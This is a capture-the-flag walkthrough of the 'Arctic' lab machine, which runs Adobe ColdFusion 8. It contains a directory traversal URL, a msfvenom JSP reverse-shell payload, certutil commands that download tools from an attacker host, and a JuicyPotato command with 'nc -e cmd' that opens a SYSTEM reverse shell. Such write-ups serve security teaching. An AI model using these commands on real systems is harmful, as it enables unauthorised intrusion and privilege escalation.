Arctic

Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.11 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.-p-
scanning the entire port range, from 1 to 65535.-T5
insane mode, it is the fastest mode of the nmap time template.-Pn
assume the host is online.-n
scan without reverse DNS resolution.-oN
save the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed Jan 12 15:27:38 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.16s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
# Nmap done at Wed Jan 12 15:30:02 2022 -- 1 IP address (1 host up) scanned in 144.22 seconds
As we see, ports 135, 8500 and 49154 are open. Let's try to obtain more information about the service and version running on those ports. The following command will scan the previous ports more in depth and save the result into a file:
nmap -sC -sV -p135,8500,49154 10.10.10.11 -oN targeted
-sC
performs the scan using the default set of scripts.-sV
enables version detection.-oN
save the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed Jan 12 15:31:30 2022 as: nmap -sCV -p135,8500,49154 -oN targeted 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.065s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 15:33:47 2022 -- 1 IP address (1 host up) scanned in 137.04 seconds
Nmap it's not really sure what service is running in port 8500. If we see if there is any website with the browser, we will see there is a web server with directory listing.

If we take a look at the CFIDE/
directory, we will find the Administrator/
directory which will show us a login page.


Exploitation
Now we know we are facing an Adobe Coldfusion 8 login page. Let's search for any common exploits on exploit-db.
I found a Directory Traversal exploit which points at the following URL.
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Let's check it out.

And we get a password hash. Let's make use of rainbow tables and try to find out the password.

And we get a password! Let's log in into the administrator login page.

At this point, to get a shell, we will have to make a Scheduled Task which downloads a reverse shell from our machine and stores it into the CFIDE/
directory.
First thing we have to do, is look for the path in which the CFIDE/
is stored on the victim machine. If we look closely to the left panel, which has a lot of administrative tools, we will find the Mappings section.

Now we know where the /CFIDE
directory is located in the victim machine. Before creating the Scheduled Task, let's create the reverse shell file.
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.9 lport=4444 -o shell.jsp
-p
indicates the type of payload.lhost
local host IP.lport
local port of the listener.-o
save the output to a file.
And we set an HTTP server with python on port 8000.
python -m SimpleHTTPServer
Now it's time to make the Scheduled Task. We will have to click on Scheduled Tasks > Schedule New Task
. Next, we will put a name to the task, set the URL to the shell.jsp
binary located in our machine, and indicate the absolute path of the output file which will be C:\ColdFusion8\wwroot\CFIDE\shell.jsp
, and hit Submit.

To activate the Scheduled Task, let's click on the green button, and we should see a GET petition on the python HTTP server.

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.11 - - [24/Jan/2022 16:55:51] "GET /shell.jsp HTTP/1.1" 200 -
If now we check the /CFIDE
directory, we will see the shell.jsp
file.

Before activating it, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l
listen mode.-v
verbose mode.-n
numeric-only IP, no DNS resolution.-p
specify the port to listen on.
If we now click on the shell link, we should get the reverse shell as the user tolis, and we could be able to grab the user flag.
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.11] 49506
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
C:\ColdFusion8\runtime\bin>type \users\tolis\desktop\user.txt
type \users\tolis\desktop\user.txt
02650d3a69a70780c302e146a6cb96f3
Privilege Escalation
Let's start by seeing what privileges the user tolis has.
whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
To escalate privileges, we'll have to transfer JuicyPotato.exe
and nc.exe
binaries to the victim machine. Let's set a python HTTP server on the directory where we have those binaries.
python -m SimpleHTTPServer
And download the binaries from the desktop folder of the tolis user.
certutil.exe -f -urlcache -split http://10.10.14.9:8000/JuicyPotato.exe JuicyPotato.exe
certutil.exe -f -urlcache -split http://10.10.14.9:8000/nc.exe nc.exe
Before executing the JuicyPotato.exe
binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM
user.
nc -lvnp 5555
-l
listen mode.-v
verbose mode.-n
numeric-only IP, no DNS resolution.-p
specify the port to listen on.
Finally, let's run the Juicy Potato binary and get a shell as the NT AUTHORITY\SYSTEM
user. Then all we have to do is reap the harvest and take the root flag.
JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\users\tolis\desktop\nc.exe -e cmd 10.10.14.9 5555"
-t
createprocess call.-l
COM server listen port.-p
program to launch.-a
specify command arguments.
listening on [any] 5555 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.11] 49645
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
ce65ceee66b2b5ebaff07e50508ffb90
Last updated
Was this helpful?